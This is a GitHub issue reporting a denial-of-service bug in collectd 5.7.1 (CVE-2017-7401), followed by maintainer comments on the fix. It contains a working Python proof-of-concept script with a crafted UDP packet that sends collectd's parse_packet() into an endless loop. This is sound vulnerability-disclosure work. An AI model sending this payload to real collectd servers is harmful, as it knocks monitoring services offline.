Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Endless loop in parse_packet() while statement (CPU drain/DoS) #2174

Closed
marcinguy opened this issue Feb 13, 2017 · 4 comments

Comments

Projects
None yet
3 participants
@marcinguy
Copy link

commented Feb 13, 2017

  • Version of collectd: 5.7.1 (build from source)
  • Operating system / distribution:
    Linux laptop 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Expected behavior

Working as usual

Actual behavior

After sending this payload, collectd seems to be entering endless while() loop in packet_parse consuming high CPU resources, possibly crash/gets killed after a while.

Tasks: 290 total, 2 running, 288 sleeping, 0 stopped, 0 zombie
%Cpu(s): 19,7 us, 32,8 sy, 0,0 ni, 47,1 id, 0,3 wa, 0,0 hi, 0,2 si, 0,0 st
KiB Mem : 7604408 total, 267056 free, 2153052 used, 5184300 buff/cache
KiB Swap: 7806972 total, 7528876 free, 278096 used. 4498796 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
605 collectd 20 0 852496 5088 2700 S 62,5 0,1 0:57.17 collectd

Steps to reproduce

Below is a packet, python program that crafts the packet that causes this problem.

# dos.py

import socket

UDP_IP = "127.0.0.1"
UDP_PORT = 25826

print "UDP target IP:", UDP_IP
print "UDP target port:", UDP_PORT

sock = socket.socket(socket.AF_INET, # Internet
             socket.SOCK_DGRAM) # UDP

payload="\x02\x00\x00\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x40\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x63\x00\x00\x05\x00\x40\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x06\x00\x33\x00\x50\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40"

sock.sendto(payload,(UDP_IP, UDP_PORT))
@marcinguy

This comment has been minimized.

Copy link
Author

commented Feb 14, 2017

Narrowed it to a smaller packet, seems like this packet is also causing the issue.
packet

@marcinguy marcinguy changed the title Endless loop in parse_packet() while statement (CPU drain) Endless loop in parse_packet() while statement (CPU drain/DoS) Feb 18, 2017

@rpv-tomsk

This comment has been minimized.

Copy link
Contributor

commented Apr 2, 2017

@octo, @rubenk - which versions are supported at the moment? Which branch should be choosed as a target branch to PR?

rpv-tomsk added a commit to rpv-tomsk/collectd that referenced this issue Apr 3, 2017

Fix endless loop DOS in parse_packet()
When correct 'Signature part' is received by Collectd, configured without
AuthFile option, condition for endless loop occurs due to missing increase
of pointer to next unprocessed part.

Closes: collectd#2174
@rpv-tomsk

This comment has been minimized.

Copy link
Contributor

commented Apr 3, 2017

This issue has CVE-2017-7401 assigned.

rpv-tomsk added a commit to rpv-tomsk/collectd that referenced this issue Apr 3, 2017

Fix endless loop DOS in parse_packet()
When correct 'Signature part' is received by Collectd, configured without
AuthFile option, condition for endless loop occurs due to missing increase
of pointer to next unprocessed part.

Fixes: CVE-2017-7401
Closes: collectd#2174

@octo octo self-assigned this Apr 4, 2017

@octo octo added the Bug label Apr 4, 2017

@octo

This comment has been minimized.

Copy link
Member

commented Apr 4, 2017

Thank you very much for reporting this, @marcinguy! I've merged Pavel's patch, hopefully fixing the issue.

Pleae send me an email (→ contact) so I can send you a collectd t-shirt!

Best regards,
—octo

@rubenk rubenk closed this in f6be4f9 Apr 14, 2017

rpv-tomsk added a commit to rpv-tomsk/collectd that referenced this issue Sep 21, 2017

Fix endless loop DOS in parse_packet()
When correct 'Signature part' is received by Collectd, configured without
AuthFile option, condition for endless loop occurs due to missing increase
of pointer to next unprocessed part.

Fixes: CVE-2017-7401
Closes: collectd#2174
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.